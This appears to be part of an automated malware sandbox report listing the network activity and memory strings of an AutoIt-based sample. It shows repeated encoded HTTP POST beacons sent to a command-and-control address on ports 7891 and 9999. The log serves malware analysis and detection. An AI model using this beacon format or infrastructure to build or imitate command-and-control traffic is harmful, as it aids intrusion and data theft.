            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 520Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31 Data Ascii: 
id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 144Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global traffic | TCP traffic: 192.168.2.4:49690 -> 80.66.88.145:7891
            Source: unknown | TCP traffic detected without corresponding DNS query (observed 50 times): 80.66.88.145
            Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://80.66.88.
            Source: cmd.exe, 0000000E.00000002.708417301.000000000517B000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://80.66.88.145
            Source: Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://80.66.88.145&
            Source: cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://80.66.88.145:7891
            Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://80.66.88.145:9999
            Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://80.66.88.145:9999d
            Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://80.66.88.145:9999hd
            Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://80.66.88.145:9999l
            Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://80.66.88.145:9999n
            Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://80.66.88.145:9999pT$
            Source: cmd.exe, 00000009.00000002.616707929.0000000005B00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://80.66.88.145:9999x
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000000.557064508.0000000000A49000.00000002.00000001.01000000.00000007.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000000.589433696.0000000000F59000.00000002.00000001.01000000.0000000B.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: OLicenseHeartbeat.exe, 0000000C.00000002.812170962.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.comh
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
            Source: unknown HTTP traffic detected: POST / HTTP/1.0 Host: 80.66.88.145:7891 Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) Content-Type: application/x-www-form-urlencoded Content-Length: 658 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aEylcE7lcEOhcEOlaHYlcE3JcEOrc%2BOlaDylcE7CcEOrboOlaH3lcEfPcEO4cEOlao3lcE36cEOhcDOlaD5lcE3rcEOrboOlaDklcE74cEO4cEOla%2BMlcEYrcEO8aEOlcDOlcEx6cEOhbEOla%2BxlcE36cEOhcDOlaHklcE3XcEOrX%2BOlcDOlcEklcEOrcoOlaDYlcEfmcEOrcoOlaD7lcE36cEO4cEOlcHxlcESlcEO6aoOlaKklcEk4cEOCaoOlaE7lcExJcEO6c%2BOlaoxlcEx6cEO6cDOlaEklcExCcEO4cEOlcHxlcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOraEOlcDOlcE76cEOhc%2BOlaD5lcEfPcEOra%2BOlcDOlcEAecEO6c%2BOlaE5lcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOhcDOlcDOlcE3rcEOhcDOlaH3lcEfecEO4cEOla%2B7lcE7hcEOha%2BOlcHklcE36cEOhbEOlaDklcEfecEOhc%2BOlaD5lcEGPcEOrc%2BOlaH3lcEfecERZcfhC%2BDfZhS08nz&act=1000
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00428238 recv
